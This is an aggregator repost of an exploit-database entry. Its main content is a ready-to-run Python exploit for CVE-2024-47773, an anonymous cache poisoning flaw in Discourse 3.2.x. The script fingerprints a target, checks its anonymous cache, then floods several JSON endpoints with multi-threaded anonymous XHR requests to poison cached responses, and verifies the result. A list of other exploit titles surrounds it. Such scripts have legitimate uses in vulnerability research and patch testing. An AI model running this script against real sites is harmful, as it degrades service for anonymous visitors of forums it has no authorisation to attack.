惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

U
Unit 42
S
Security Affairs
Engineering at Meta
Engineering at Meta
MongoDB | Blog
MongoDB | Blog
Microsoft Security Blog
Microsoft Security Blog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
美团技术团队
月光博客
月光博客
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
有赞技术团队
有赞技术团队
博客园 - 叶小钗
Hugging Face - Blog
Hugging Face - Blog
Microsoft Azure Blog
Microsoft Azure Blog
V
V2EX
Vercel News
Vercel News
阮一峰的网络日志
阮一峰的网络日志
腾讯CDC
C
Cisco Blogs
T
Tor Project blog
The Hacker News
The Hacker News
雷峰网
雷峰网
MyScale Blog
MyScale Blog
博客园 - 司徒正美
AWS News Blog
AWS News Blog
GbyAI
GbyAI
Y
Y Combinator Blog
D
DataBreaches.Net
Simon Willison's Weblog
Simon Willison's Weblog
S
Securelist
The GitHub Blog
The GitHub Blog
S
SegmentFault 最新的问题
T
Tenable Blog
L
LangChain Blog
M
MIT News - Artificial intelligence
N
Netflix TechBlog - Medium
The Cloudflare Blog
A
About on SuperTechFans
IT之家
IT之家
F
Fortinet All Blogs
Security Latest
Security Latest
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
NISL@THU
NISL@THU
爱范儿
爱范儿
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
W
WeLiveSecurity
A
Arctic Wolf
I
Intezer
Application and Cybersecurity Blog
Application and Cybersecurity Blog

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Discourse 3.2.x Anonymous Cache Poisoning
2025-07-11 · via The Exploit Database - CXSecurity.com

Discourse 3.2.x Anonymous Cache Poisoning

#!/usr/bin/env python3 """ Exploit Title: Discourse 3.2.x - Anonymous Cache Poisoning Date: 2024-10-15 Exploit Author: ibrahimsql Github: : https://github.com/ibrahmsql Vendor Homepage: https://discourse.org Software Link: https://github.com/discourse/discourse Version: Discourse < latest (patched) Tested on: Discourse 3.1.x, 3.2.x CVE: CVE-2024-47773 CVSS: 7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L) Description: Discourse anonymous cache poisoning vulnerability allows attackers to poison the cache with responses without preloaded data through multiple XHR requests. This affects only anonymous visitors of the site. Reference: https://nvd.nist.gov/vuln/detail/CVE-2024-47773 """ import requests import sys import argparse import time import threading import json from urllib.parse import urljoin class DiscourseCachePoisoning: def __init__(self, target_url, threads=10, timeout=10): self.target_url = target_url.rstrip('/') self.threads = threads self.timeout = timeout self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest' }) self.poisoned = False def check_target(self): """Check if target is accessible and running Discourse""" try: response = self.session.get(f"{self.target_url}/", timeout=self.timeout) if response.status_code == 200: if 'discourse' in response.text.lower() or 'data-discourse-setup' in response.text: return True except Exception as e: print(f"[-] Error checking target: {e}") return False def check_anonymous_cache(self): """Check if anonymous cache is enabled""" try: # Test endpoint that should be cached for anonymous users response = self.session.get(f"{self.target_url}/categories.json", timeout=self.timeout) # Check cache headers cache_headers = ['cache-control', 'etag', 'last-modified'] has_cache = any(header in response.headers for header in cache_headers) if has_cache: print("[+] Anonymous cache appears to be enabled") return True else: print("[-] Anonymous cache may be disabled") return False except Exception as e: print(f"[-] Error checking cache: {e}") return False def poison_cache_worker(self, endpoint): """Worker function for cache poisoning attempts""" try: # Create session without cookies to simulate anonymous user anon_session = requests.Session() anon_session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest' }) # Make rapid requests to poison cache for i in range(50): response = anon_session.get( f"{self.target_url}{endpoint}", timeout=self.timeout ) # Check if response lacks preloaded data if response.status_code == 200: try: data = response.json() # Check for missing preloaded data indicators if self.is_poisoned_response(data): print(f"[+] Cache poisoning successful on {endpoint}") self.poisoned = True return True except: pass time.sleep(0.1) except Exception as e: pass return False def is_poisoned_response(self, data): """Check if response indicates successful cache poisoning""" # Look for indicators of missing preloaded data indicators = [ # Missing or empty preloaded data not data.get('preloaded', True), data.get('preloaded') == {}, # Missing expected fields 'categories' in data and not data['categories'], 'topics' in data and not data['topics'], # Error indicators data.get('error') is not None, data.get('errors') is not None ] return any(indicators) def test_cache_poisoning(self): """Test cache poisoning on multiple endpoints""" print("[*] Testing cache poisoning vulnerability...") # Target endpoints that are commonly cached endpoints = [ '/categories.json', '/latest.json', '/top.json', '/c/general.json', '/site.json', '/site/basic-info.json' ] threads = [] for endpoint in endpoints: print(f"[*] Testing endpoint: {endpoint}") # Create multiple threads to poison cache for i in range(self.threads): thread = threading.Thread( target=self.poison_cache_worker, args=(endpoint,) ) threads.append(thread) thread.start() # Wait for threads to complete for thread in threads: thread.join(timeout=5) if self.poisoned: break time.sleep(1) return self.poisoned def verify_poisoning(self): """Verify if cache poisoning was successful""" print("[*] Verifying cache poisoning...") # Test with fresh anonymous session verify_session = requests.Session() verify_session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' }) try: response = verify_session.get(f"{self.target_url}/categories.json", timeout=self.timeout) if response.status_code == 200: try: data = response.json() if self.is_poisoned_response(data): print("[+] Cache poisoning verified - anonymous users affected") return True else: print("[-] Cache poisoning not verified") except: print("[-] Unable to parse response") else: print(f"[-] Unexpected response code: {response.status_code}") except Exception as e: print(f"[-] Error verifying poisoning: {e}") return False def exploit(self): """Main exploit function""" print(f"[*] Testing Discourse Cache Poisoning (CVE-2024-47773)") print(f"[*] Target: {self.target_url}") if not self.check_target(): print("[-] Target is not accessible or not running Discourse") return False print("[+] Target confirmed as Discourse instance") if not self.check_anonymous_cache(): print("[-] Anonymous cache may be disabled (DISCOURSE_DISABLE_ANON_CACHE set)") print("[*] Continuing with exploit attempt...") success = self.test_cache_poisoning() if success: print("[+] Cache poisoning attack successful!") self.verify_poisoning() print("\n[!] Impact: Anonymous visitors may receive responses without preloaded data") print("[!] Recommendation: Upgrade Discourse or set DISCOURSE_DISABLE_ANON_CACHE") return True else: print("[-] Cache poisoning attack failed") print("[*] Target may be patched or cache disabled") return False def main(): parser = argparse.ArgumentParser(description='Discourse Anonymous Cache Poisoning (CVE-2024-47773)') parser.add_argument('-u', '--url', required=True, help='Target Discourse URL') parser.add_argument('-t', '--threads', type=int, default=10, help='Number of threads (default: 10)') parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10)') args = parser.parse_args() exploit = DiscourseCachePoisoning(args.url, args.threads, args.timeout) try: success = exploit.exploit() sys.exit(0 if success else 1) except KeyboardInterrupt: print("\n[-] Exploit interrupted by user") sys.exit(1) except Exception as e: print(f"[-] Exploit failed: {e}") sys.exit(1) if __name__ == '__main__': main()



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}